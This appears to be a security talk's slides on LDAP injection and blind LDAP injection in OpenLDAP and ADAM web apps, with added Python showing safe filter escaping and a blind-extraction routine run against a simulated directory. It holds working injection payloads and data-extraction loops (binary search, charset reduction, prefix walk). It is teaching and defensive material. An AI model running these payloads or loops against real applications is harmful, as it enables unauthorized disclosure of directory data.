LDAP Injection & Blind LDAP Injection
Testing WebApps in an OpenLDAP & ADAM environment
Chema Alonso – [email_address]
Microsoft MVP Corporate Security
Security Consultant – Informática64
http://www.informatica64.com
Login Process in a Webapp
Elevation of Privileges in an insecure WebApp
Accessing data in an insecure WebApp
Example. The filter the application builds from the printer type:
(&(objectClass=printer)(type=HP LaserJet 2100))

Injection to obtain the TRUE result (the injected presence filter is satisfied by every entry, so the AND still matches):
(&(objectClass=printer)(type=HP LaserJet 2100)(objectClass=*))

Injections to obtain the objectClass values (each probe is TRUE only when the matched entry also carries that objectClass value):
(&(objectClass=printer)(type=HP LaserJet 2100)(objectClass=logins))
(&(objectClass=printer)(type=HP LaserJet 2100)(objectClass=docs))
(&(objectClass=printer)(type=HP LaserJet 2100)(objectClass=news))
(&(objectClass=printer)(type=HP LaserJet 2100)(objectClass=adms))
(&(objectClass=printer)(type=HP LaserJet 2100)(objectClass=users))
…
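As an added example (mine, not code from the slides), the string-concatenation filter builder that the injection above relies on, beside the RFC 4515 escaping that neutralises the same input. The function names and the allowlist pattern are assumptions; the payload is the slide's own "always TRUE" input.

```python
import re

# Characters with meaning inside an LDAP search filter, and their RFC 4515 escapes.
_LDAP_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}

def escape_filter_value(value: str) -> str:
    """Escape an assertion value so it can only match as a literal string."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)

def build_filter_unsafe(printer_type: str) -> str:
    """The vulnerable pattern: user input spliced straight into the filter."""
    return "(&(objectClass=printer)(type=" + printer_type + "))"

def build_filter_safe(printer_type: str) -> str:
    """Same filter, with the user value escaped before it is spliced in."""
    return "(&(objectClass=printer)(type=" + escape_filter_value(printer_type) + "))"

# Hypothetical allowlist for this field: a product name is letters, digits, spaces
# and a few punctuation marks, never filter metacharacters.
_SAFE_TYPE = re.compile(r"[A-Za-z0-9 ._-]{1,64}")

def is_plausible_printer_type(value: str) -> bool:
    return _SAFE_TYPE.fullmatch(value) is not None

# Constructed attacker input, taken from the slide: it closes the type= assertion
# and appends a presence filter that every entry satisfies. The application's
# trailing ')' then closes the AND, so the filter stays syntactically valid.
PAYLOAD = "HP LaserJet 2100)(objectClass=*"

if __name__ == "__main__":
    print("unsafe :", build_filter_unsafe(PAYLOAD))
    print("escaped:", build_filter_safe(PAYLOAD))
    print("allowed:", is_plausible_printer_type(PAYLOAD))
```

Escaping keeps the user value inside its own assertion, so the injected `)(objectClass=*` becomes the literal string `\29\28objectClass=\2a` and matches no printer. An allowlist on the expected format is a cheap second check when the field is a fixed product name. Real client libraries ship an equivalent escape routine (ldap3's `escape_filter_chars`, for instance); prefer that over a hand-rolled table in production code.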
 
Discovering attributes in an insecure WebApp
Screenshot 1: the attribute does NOT exist (or the bind has no access privilege on it), so the probe returns nothing.
Screenshot 2: the attribute exists (and the bind has access privilege on it), so the probe returns the entry.
Example: recovering a numeric attribute by binary search. Each (salary>=middle) probe halves the remaining interval:

Low index: 1 – High index: 10 – Middle value: 5
(&(objectClass=*)(uid=jparada)(salary>=5)) -> FALSE, so salary < 5
Low index: 1 – High index: 4 – Middle value: 2
(&(objectClass=*)(uid=jparada)(salary>=2)) -> TRUE, so salary >= 2
Low index: 2 – High index: 4 – Middle value: 3
(&(objectClass=*)(uid=jparada)(salary>=3)) -> TRUE, so salary >= 3
Low index: 3 – High index: 4 – Middle value: 4
(&(objectClass=*)(uid=jparada)(salary>=4)) -> TRUE, so salary >= 4
Low index: 4 – High index: 4
Salary = 4 [million € per month]
Injections to obtain department values using data booleanization (a prefix walk: extend the known prefix one character at a time):
(&(objectClass=printer)(type=HP LaserJet 2100)(department=*)) -> TRUE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=a*)) -> FALSE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=b*)) -> FALSE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=c*)) -> FALSE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=d*)) -> FALSE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=e*)) -> FALSE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=f*)) -> TRUE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=fa*)) -> FALSE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=fb*)) -> FALSE
…
(&(objectClass=printer)(type=HP LaserJet 2100)(department=fi*)) -> TRUE
 
Data Booleanization in an insecure WebApp (screenshots alternating a FALSE response and a TRUE response)
Injections to obtain the character set used to store data in an attribute (a substring probe per character; only characters that answer TRUE need to be tried in the prefix walk):
(&(objectClass=printer)(type=HP LaserJet 2100)(department=*a*)) -> TRUE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=*b*)) -> FALSE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=*c*)) -> TRUE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=*d*)) -> FALSE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=*e*)) -> FALSE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=*f*)) -> TRUE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=*g*)) -> FALSE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=*h*)) -> FALSE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=*i*)) -> TRUE
…
(&(objectClass=printer)(type=HP LaserJet 2100)(department=*z*)) -> TRUE
 
Charset Reduction in an insecure WebApp (screenshots: a FALSE response and a TRUE response)
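Added example, not part of the slides: the three blind-injection loops shown above (binary search on a numeric attribute, charset reduction, and the prefix walk on a string attribute), together with the attribute-existence probe, run against a constructed in-memory directory that stands in for the vulnerable page. The entries, the oracle, the filter prefixes and every helper name are my assumptions; only the attribute names and the filter shapes come from the slides. The evaluator implements just the AND, equality, substring, presence and >= forms the probes need.

```python
import re

# Constructed directory standing in for the OpenLDAP/ADAM backend. The attribute
# names follow the slides; the values are made up for this example.
DIRECTORY = [
    {"objectClass": "printer", "type": "HP LaserJet 2100", "department": "financial"},
    {"objectClass": "person", "uid": "jparada", "salary": "4"},
]

# --- minimal filter evaluator: '(&(a=b)(c>=d)...)' or a single '(a=b)' ---
def _parse(s, i=0):
    """Return (node, next_index); node is ('&', children) or ('item', 'attr=value')."""
    if s[i + 1] == "&":
        children, i = [], i + 2
        while s[i] == "(":
            child, i = _parse(s, i)
            children.append(child)
        return ("&", children), i + 1            # skip the closing ')'
    j = s.index(")", i)
    return ("item", s[i + 1:j]), j + 1

def _match_item(entry, item):
    if ">=" in item:                             # ordering match, numeric values only here
        attr, val = item.split(">=", 1)
        try:
            return attr in entry and int(entry[attr]) >= int(val)
        except ValueError:
            return False
    attr, val = item.split("=", 1)
    if attr not in entry:
        return False                             # a missing attribute never matches
    if val == "*":
        return True                              # presence filter
    pattern = ".*".join(re.escape(part) for part in val.split("*"))
    return re.fullmatch(pattern, entry[attr], re.IGNORECASE) is not None

def _eval(node, entry):
    kind, body = node
    if kind == "&":
        return all(_eval(child, entry) for child in body)
    return _match_item(entry, body)

def oracle(filter_str):
    """The vulnerable page as a boolean oracle: True if any entry matches the filter."""
    node, end = _parse(filter_str)
    assert end == len(filter_str), "unbalanced filter"
    return any(_eval(node, entry) for entry in DIRECTORY)

# Application-side filter prefixes the attacker appends to; the app adds the final ')'.
PRINTER_PREFIX = "(&(objectClass=printer)(type=HP LaserJet 2100)"
USER_PREFIX = "(&(objectClass=*)(uid=jparada)"

def binary_search_int(prefix, attr, lo, hi):
    """Recover an integer attribute known to lie in [lo, hi] with (attr>=mid) probes."""
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if oracle(f"{prefix}({attr}>={mid}))"):
            lo = mid                             # value >= mid
        else:
            hi = mid - 1                         # value < mid
    return lo

def reduce_charset(prefix, attr, charset):
    """Charset reduction: keep only the characters that occur somewhere in the value."""
    return [c for c in charset if oracle(f"{prefix}({attr}=*{c}*))")]

def extract_string(prefix, attr, charset):
    """Prefix walk: extend the recovered prefix one character at a time.
    Returns None when the attribute is absent or not readable by the app's bind."""
    if not oracle(f"{prefix}({attr}=*))"):
        return None
    value = ""
    while True:
        for c in charset:
            if oracle(f"{prefix}({attr}={value}{c}*))"):
                value += c
                break
        else:
            return value                         # no extension matches: value is complete

if __name__ == "__main__":
    print("salary      :", binary_search_int(USER_PREFIX, "salary", 1, 10))
    alphabet = reduce_charset(PRINTER_PREFIX, "department", "abcdefghijklmnopqrstuvwxyz")
    print("charset     :", "".join(alphabet))
    print("department  :", extract_string(PRINTER_PREFIX, "department", alphabet))
    print("serialNumber:", extract_string(PRINTER_PREFIX, "serialNumber", alphabet))
```

Each oracle call is one HTTP request, so the loops cost roughly log2(range), |charset| and |charset| x len(value) requests respectively, which is why the reduction step runs before the walk. Two caveats when moving from the simulation to a real directory: the prefix walk stops early if a character of the value is outside the reduced charset (so include digits and punctuation in the reduction pass), and `>=` is only a usable ordering probe when the attribute's syntax has an ORDERING matching rule (OpenLDAP typically evaluates the assertion as Undefined for a plain string attribute, while Active Directory and ADAM compare strings lexically).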
